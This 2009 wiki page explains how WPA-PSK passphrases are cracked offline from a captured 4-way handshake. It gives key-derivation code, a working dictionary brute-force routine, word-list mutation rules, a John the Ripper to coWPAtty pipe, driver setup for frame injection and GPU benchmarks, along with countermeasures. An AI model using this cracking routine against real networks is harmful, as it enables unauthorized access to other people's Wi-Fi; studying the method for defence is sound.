WPA Attack

From ivc wiki
Revision as of 00:17, 18 September 2009 by Ivc (talk | contribs)

WPA is the successor to WEP, created to fill the need for a secure replacement after the flaws in WEP encryption were fully disclosed.

Background

Most wireless networks operating today use WPA with a Pre-Shared Key (PSK), i.e. a common password shared between the Access Point and the Client Station, for protection. While the 802.11i standard, on which WPA is based, is still intact, the authentication is prone to an offline brute-force attack.

4-Way handshake

When a client wants to connect to an access point, the following simplified stages take place:

  1. Client takes the Password and ESSID of the network to compute a Pairwise Master Key and sends a request to the AP asking to connect
  2. AP responds with a random ANonce number
  3. Client creates a random SNonce number and uses the Pairwise Master Key, ANonce, SNonce, and the AP and client MAC addresses to compute a Pairwise Transient Key
  4. Client signs the SNonce message using the Pairwise Transient Key and sends it unencrypted to the AP
  5. AP receives the signed SNonce and computes the Pairwise Master Key from its own Password and ESSID. It then uses the Pairwise Master Key, ANonce, SNonce, and the AP and client MAC addresses to compute a Pairwise Transient Key
  6. By signing the received SNonce message with its own Pairwise Transient Key, the AP can compare the resulting Integrity Code with the one sent by the client
  7. If they match, the AP can assume the client used the same Pairwise Master Key (Password+ESSID) to generate the Pairwise Transient Key that was used to sign the message
  8. AP sends an acknowledgment to the client, signed with the Pairwise Transient Key, that includes information for further communication

For an excellent explanation, see the Airolib-ng manual.

Key generation

The PMK is generated using the following relatively processor-intensive function (pseudo code):

  • PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)

Where the PBKDF2 method is from PKCS #5 v2.0: Password-based Cryptography Standard. The passphrase is used as the key and the SSID as the salt of an HMAC-SHA1 that is iterated 4096 times to generate a value of 256 bits. The lengths of the passphrase and the SSID have little impact on the speed of this operation [1].
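The pseudo code above maps closely onto Python's standard library. The following is a minimal sketch, assuming HMAC-SHA1 as the underlying PRF and UTF-8 encoded inputs; the function name derive_pmk is made up for this illustration and is not taken from coWPAtty or Pyrit.

```python
import hashlib


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit Pairwise Master Key for WPA-PSK.

    The passphrase is the PBKDF2 password and the SSID is the salt.
    hashlib takes the output length in bytes, so 256 bits becomes 32.
    """
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("utf-8"),
        ssid.encode("utf-8"),
        4096,  # iteration count fixed by the standard
        32,    # 32 bytes = 256 bits
    )


if __name__ == "__main__":
    # Passphrase "password" and SSID "IEEE" are a commonly used test pair.
    print(derive_pmk("password", "IEEE").hex())
```

Because the SSID acts as the salt, the same passphrase yields a different PMK on every differently named network.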

The PTK is generated using this less processor-intensive function (pseudo code):

  • PTK = PRF-512(PMK, "Pairwise key expansion", Min(AP_Mac, Client_Mac) || Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))

The PTK is the output of a keyed-HMAC function that applies the PMK to the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake [2].
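A sketch of the PRF-512 expansion in Python may make the formula more concrete. It assumes the 802.11i construction in which HMAC-SHA1 blocks over label, a zero byte, the data, and a one-byte counter are concatenated until 64 bytes are available. The function names and the placeholder inputs are illustrative only.

```python
import hashlib
import hmac

LABEL = b"Pairwise key expansion"


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """Concatenate HMAC-SHA1 blocks until 512 bits (64 bytes) are produced."""
    output = b""
    counter = 0
    while len(output) < 64:
        message = label + b"\x00" + data + bytes([counter])
        output += hmac.new(key, message, hashlib.sha1).digest()
        counter += 1
    return output[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """Build the sorted MAC/nonce string and expand it with the PMK."""
    # For equal-length byte strings, min/max compare lexicographically,
    # which orders them the same way as their numeric values.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, LABEL, data)


if __name__ == "__main__":
    # Placeholder values, not taken from a real capture.
    ptk = derive_ptk(bytes(32),
                     bytes.fromhex("001122334455"),
                     bytes.fromhex("66778899aabb"),
                     bytes(range(32)),
                     bytes(range(32, 64)))
    print(len(ptk), "bytes")
```

Sorting the addresses and nonces means both sides derive the same PTK regardless of which one they consider "first".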

  • MIC = HMAC_MD5(MIC Key, 16, 802.1x data)

A MIC value is calculated over the EAPoL message, using the MIC Key taken from the PTK.
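As a rough illustration, the MIC step can be written in a few lines of Python. This sketch assumes that the MIC Key is the first 16 bytes of the PTK and that the MIC field inside the EAPoL frame has been zeroed before hashing. WPA2 handshakes generally use HMAC-SHA1 truncated to 16 bytes instead of HMAC-MD5, which the hypothetical use_sha1 flag below stands in for.

```python
import hashlib
import hmac


def compute_mic(ptk: bytes, eapol_frame: bytes, use_sha1: bool = False) -> bytes:
    """Return the 16-byte Message Integrity Code for an EAPoL frame.

    eapol_frame is assumed to have its MIC field already set to zeros.
    """
    mic_key = ptk[:16]  # first 128 bits of the PTK
    digest = hashlib.sha1 if use_sha1 else hashlib.md5
    # HMAC-MD5 is already 16 bytes; HMAC-SHA1 (20 bytes) is truncated.
    return hmac.new(mic_key, eapol_frame, digest).digest()[:16]


if __name__ == "__main__":
    # Placeholder PTK and frame, not taken from a real capture.
    print(compute_mic(bytes(64), b"placeholder EAPoL frame").hex())
```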

Generating the PMK using the PBKDF2 function is slow and costly. It can be pre-computed as a time-space trade-off, but because the SSID is part of the computation each table is only valid for one ESSID. Both coWPAtty and Pyrit can create these hash tables. Pyrit is especially fast as it uses the GPGPU concept to speed up the process; see the Pyrit project page for the difference.
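The idea behind pre-computation can be sketched as a simple lookup table from passphrase to PMK for one ESSID. This is only an in-memory illustration under the assumptions already stated (HMAC-SHA1, 4096 iterations); it does not reproduce the coWPAtty or Pyrit file formats, and build_pmk_table is a made-up name.

```python
import hashlib


def build_pmk_table(ssid: str, passphrases) -> dict:
    """Pre-compute PMKs for one ESSID; the table is useless for any other ESSID."""
    salt = ssid.encode("utf-8")
    table = {}
    for passphrase in passphrases:
        # WPA-PSK passphrases are 8 to 63 characters long; skip anything else.
        if 8 <= len(passphrase) <= 63:
            table[passphrase] = hashlib.pbkdf2_hmac(
                "sha1", passphrase.encode("utf-8"), salt, 4096, 32)
    return table


if __name__ == "__main__":
    table = build_pmk_table("SMC", ["password", "hellohello", "short"])
    for passphrase, pmk in table.items():
        print(passphrase, pmk.hex())
```

Once the table exists, testing a captured handshake only needs the cheap PTK and MIC steps per entry, which is where the time saving comes from.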


Attack

An offline attack on the functions above is possible by disassociating any connected client(s), capturing a full 4-way handshake when the client(s) reconnect, and then extracting the AP MAC, the Client MAC, the ANonce and the SNonce. The SSID is already known.

With the above information it is possible to brute-force the passphrase by recomputing the 4-way handshake as described above (calculate the PMK and PTK, then sign the SNonce message to get the Integrity Code) for every candidate passphrase combined with the known SSID. If the passphrase is correct, the computed Integrity Code will match the captured Integrity Code.
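The loop described above can be sketched end to end in Python. Everything here is an assumption made for illustration: the helper names, the HMAC-MD5 MIC over a frame with a zeroed MIC field, and the synthetic handshake values in the demo, which are generated locally rather than parsed from a capture file.

```python
import hashlib
import hmac

LABEL = b"Pairwise key expansion"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for counter in range(4):  # 4 x 20-byte SHA-1 blocks cover 64 bytes
        out += hmac.new(pmk, LABEL + b"\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
    return out[:64]


def compute_mic(ptk: bytes, eapol_frame: bytes) -> bytes:
    return hmac.new(ptk[:16], eapol_frame, hashlib.md5).digest()


def find_passphrase(candidates, ssid, ap_mac, client_mac,
                    anonce, snonce, eapol_frame, captured_mic):
    """Return the first candidate whose MIC matches the captured one, else None."""
    for candidate in candidates:
        pmk = derive_pmk(candidate, ssid)
        ptk = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(compute_mic(ptk, eapol_frame), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    # Synthetic "capture": built from a known passphrase so the demo is self-checking.
    ssid = "somethingclever"
    ap_mac, client_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = b"synthetic EAPoL frame with zeroed MIC field"
    mic = compute_mic(derive_ptk(derive_pmk("hellohello", ssid),
                                 ap_mac, client_mac, anonce, snonce), frame)
    words = ["password1", "googlegoogle", "hellohello"]
    print(find_passphrase(words, ssid, ap_mac, client_mac, anonce, snonce, frame, mic))
```

Almost all of the time per candidate is spent in derive_pmk, which is why the tools concentrate on accelerating or pre-computing that step.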

See the coWPAtty and Pyrit source code for examples on the handshake process.

Counter-measures

As explained above, a long, random alpha-numeric password will thwart this dictionary attack. Use something like the kurtm.net WPA-PSK generator or, preferably, the Yubico USB key adapter to generate a truly random password.
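Where neither of those generators is at hand, a comparable passphrase can be produced locally. The sketch below is a stand-in using Python's secrets module, not a reimplementation of the kurtm.net generator or the Yubico device; the function name and the choice of a letters-and-digits alphabet are assumptions.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits  # 62 symbols


def random_passphrase(length: int = 63) -> str:
    """Return a random alpha-numeric passphrase of the given length.

    WPA-PSK passphrases must be 8 to 63 characters long.
    """
    if not 8 <= length <= 63:
        raise ValueError("WPA-PSK passphrases must be 8 to 63 characters long")
    # secrets.choice draws from the operating system's CSPRNG.
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    print(random_passphrase())
```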

Tools

  • pyrit - blog - Reference manual - Code details
    • Like coWPAtty and Airolib-ng
    • Pre-compute PMK keys
    • Import compressed (.gz) files
    • Supports stdin (i.e. John the Ripper piping)
    • Internal database of precomputed ESSID and PMK combinations
    • Export PMK to coWPAtty (*.cow ) and Airolib-ng (*.db) supported files
    • GPGPU acceleration
    • Strip out 4-way handshake from capture file
  • coWPAtty - coWPAtty project page - Readme
    • Like Pyrit and Airolib-ng
    • WPA-PSK attack on specific ESSID and captured 4-way handshake dump
    • Passthrough from Pyrit possible (GPGPU acceleration)
    • Pre-computed PMK tables supported
    • genpmk:
      • Generate "Pairwise Master Key" table for a specific ESSID, PMK tables
      • Table-file name should end with *.cow
  • Airolib-ng
    • Like coWPAtty and Pyrit
    • Precompute PMK keys and attack WPA/WPA2 handshake captures
    • Internal SQLite3 database
    • Can export and import coWPAtty files


Drivers

The Alfa AWUS036H adapter is a really good 500 mW USB device based on the RTL8187 chipset, but the drivers are/were buggy. Currently, as of September 2009, it seems that the Compat Wireless rtl8187/mac80211 framework drivers are the most stable and reliable for general use and the old r8187/ieee80211 drivers are most suitable for the Aircrack-ng suite and frame injection [3]. See the tutorial link below for details on how to switch between the drivers.

I can confirm that the latest rtl8187/mac80211 drivers are slow. Packet injection using the same device in Backtrack 3 (BT3) was much faster than in Backtrack 4 (BT4) pre-final. I am unsure of the cause, but it seems that the latest drivers lack a speed patch used previously (see thread below). BT3 uses the r8187/ieee80211_rtl stack, while BT4 uses the main kernel rtl8187/mac80211 stack with some patches already applied (the BT4 Beta, not Pre-final, had some rtl8187/mac80211 speed improvements applied).


Summary of how to install the BT4 r8187/ieee80211 (r8187-drivers) driver package:

aptitude search r8187
# look for the kernel version the driver was compiled for, and install it:
aptitude install linux-image-2.6.30.5 linux-source-2.6.30.5
dpkg --force-overwrite -i /var/cache/apt/archives/linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb # if it reports that firmware files already exist
 
reboot # to load new kernel
sudo rmmod rtl8187
sudo rmmod mac80211
echo "blacklist rtl8187" | sudo tee -a /etc/modprobe.d/blacklist
echo "blacklist r8187" | sudo tee -a /etc/modprobe.d/blacklist
echo "blacklist rt2870sta" | sudo tee -a /etc/modprobe.d/blacklist
echo "blacklist mac80211" | sudo tee -a /etc/modprobe.d/blacklist
aptitude install r8187-drivers
modprobe r8187

Word lists

List of word lists

These are compiled word lists and readily available.

Generating word lists

By following simple guidelines a good word-list can be generated. Consider the following:

  • Most people use easy-to-remember passwords; for WPA the password has to be at least 8 characters long
  • A digit 0-9 is often appended to the word, e.g. (word)1, (word)2, (word)3, ..
  • Sequences of numbers are often used, e.g. 123, 321, 999, ..
  • The first letter is often upper-case
  • Short words (under 8 characters) are often repeated twice, e.g. googlegoogle, hellohello, openopen, ..
  • Forename and surname are often used
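The guidelines above can be turned into a small candidate generator. This is a minimal sketch in Python rather than a John the Ripper rule set; the function names, the fixed list of number sequences, and the way names are joined are all choices made for this illustration.

```python
SEQUENCES = ("123", "321", "999")


def mutate(word: str) -> list:
    """Return sorted candidate passphrases derived from one base word."""
    bases = {word, word.capitalize()}      # first letter is often upper-case
    variants = set(bases)
    for base in bases:
        for digit in range(10):            # (word)0 .. (word)9
            variants.add(base + str(digit))
        for sequence in SEQUENCES:         # common number sequences
            variants.add(base + sequence)
        variants.add(base + base)          # short words repeated twice
    # WPA-PSK only accepts passphrases of 8 to 63 characters.
    return sorted(v for v in variants if 8 <= len(v) <= 63)


def combine_names(forename: str, surname: str) -> list:
    """Return forename+surname combinations that are long enough for WPA."""
    joined = {forename + surname, forename.capitalize() + surname.capitalize()}
    return sorted(v for v in joined if 8 <= len(v) <= 63)


if __name__ == "__main__":
    for candidate in mutate("google") + combine_names("john", "smith"):
        print(candidate)
```

Filtering on length early keeps the list small, since anything under 8 characters can never be a valid WPA passphrase.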

John the Ripper (JTR) and Raptor 3 are great utilities to create all the permutations mentioned above. JTR has an extended rules engine to build the permutations, and it can pipe the candidates straight to the cracking tool to avoid having to save the generated stream [4].

john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | \
  cowpatty -r eap-test.dump -f - -s somethingclever

Tools

GPU acceleration

[Figure: CPU vs GPU]

CUDA (Compute Unified Device Architecture) is a parallel computing architecture developed by NVIDIA [5]. Its competitor, FireStream / Fire Processor, is a stream processor developed by ATI Technologies. Both are based on the GPGPU (General Purpose Graphics Processing Unit) concept for heavy floating-point computations [6]. Instead of having four or eight threads crunching on a parallelized task in the CPU, you could have 64, 320, or even more stream processors (Unified Shaders) tackling the same work in the GPU [7].

Traditionally the GPU has been very limited, only accelerating part of the graphics pipeline. Utilizing the GPU to perform floating-point computations can be orders of magnitude faster than using a modern CPU. It is possible to achieve over a teraflop of theoretical computing capacity using relatively inexpensive commodity hardware.

As a side note, SLI cannot be used; each GPU is addressed as an individual processing unit.

Practical attack

Handy commands

Connect to OPEN network:

ifconfig wlan0 down
iwconfig wlan0 mode managed
iwconfig wlan0 essid SMC
dhclient wlan0 -d

Connect to WEP protected network:

ifconfig wlan0 down
iwconfig wlan0 mode managed
iwconfig wlan0 enc (40/104bit key)
iwconfig wlan0 essid SMC
dhclient wlan0 -d

Performance measurements

I was fortunate enough to get access to a SuperMicro Dual Tesla C1060 GPU server for 10 days; special thanks to Geir over at Nextron.

Server set-up:

root@bt:~/pyrit# hdparm -tT /dev/sda

/dev/sda:
 Timing cached reads:   15464 MB in  2.00 seconds = 7740.52 MB/sec
 Timing buffered disk reads:  368 MB in  3.01 seconds = 122.19 MB/sec

Pyrit benchmark:

root@bt:~/pyrit# pyrit benchmark
Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

Running benchmark for at least 60 seconds...

#1: 'CUDA-Device #1 'Tesla C1060: 12146.7 PMKs/s (Occ. 95.2%; RTT 2.6)
#2: 'CUDA-Device #2 'Tesla C1060: 12155.2 PMKs/s (Occ. 95.8%; RTT 2.8)
#3: 'CPU-Core (SSE2)': 632.6 PMKs/s (Occ. 98.6%; RTT 3.0)
#4: 'CPU-Core (SSE2)': 637.1 PMKs/s (Occ. 94.1%; RTT 3.0)
#5: 'CPU-Core (SSE2)': 636.8 PMKs/s (Occ. 93.9%; RTT 3.0)
#6: 'CPU-Core (SSE2)': 637.3 PMKs/s (Occ. 98.2%; RTT 3.0)
#7: 'CPU-Core (SSE2)': 643.8 PMKs/s (Occ. 93.5%; RTT 3.0)
#8: 'CPU-Core (SSE2)': 642.0 PMKs/s (Occ. 93.1%; RTT 3.0)

Benchmark done. 28131 PMKs/s total.
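To put the benchmark into perspective, the per-device rates can be summed and turned into a time estimate for exhausting a keyspace. The sketch below only does that arithmetic. The two example keyspaces (8-digit numbers and 8 lower-case letters) are assumptions chosen for illustration, and real runs would also pay for the PTK and MIC steps.

```python
# Per-device rates in PMKs/s, copied from the benchmark output above.
GPU_RATES = [12146.7, 12155.2]
CPU_RATES = [632.6, 637.1, 636.8, 637.3, 643.8, 642.0]


def seconds_to_exhaust(keyspace: int, pmks_per_second: float) -> float:
    """Worst-case time to try every passphrase in the keyspace."""
    return keyspace / pmks_per_second


if __name__ == "__main__":
    total = sum(GPU_RATES) + sum(CPU_RATES)
    print(f"total rate: {total:.1f} PMKs/s")
    print(f"GPU share:  {sum(GPU_RATES) / total:.1%}")

    digits = seconds_to_exhaust(10 ** 8, total)   # 00000000 .. 99999999
    letters = seconds_to_exhaust(26 ** 8, total)  # aaaaaaaa .. zzzzzzzz
    print(f"8 digits:  {digits / 60:.0f} minutes")
    print(f"8 letters: {letters / 86400:.0f} days")
```

At this rate all 8-digit numeric passphrases fall in about an hour, while 8 random lower-case letters already take on the order of 86 days, which supports the advice to use long random passphrases.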

References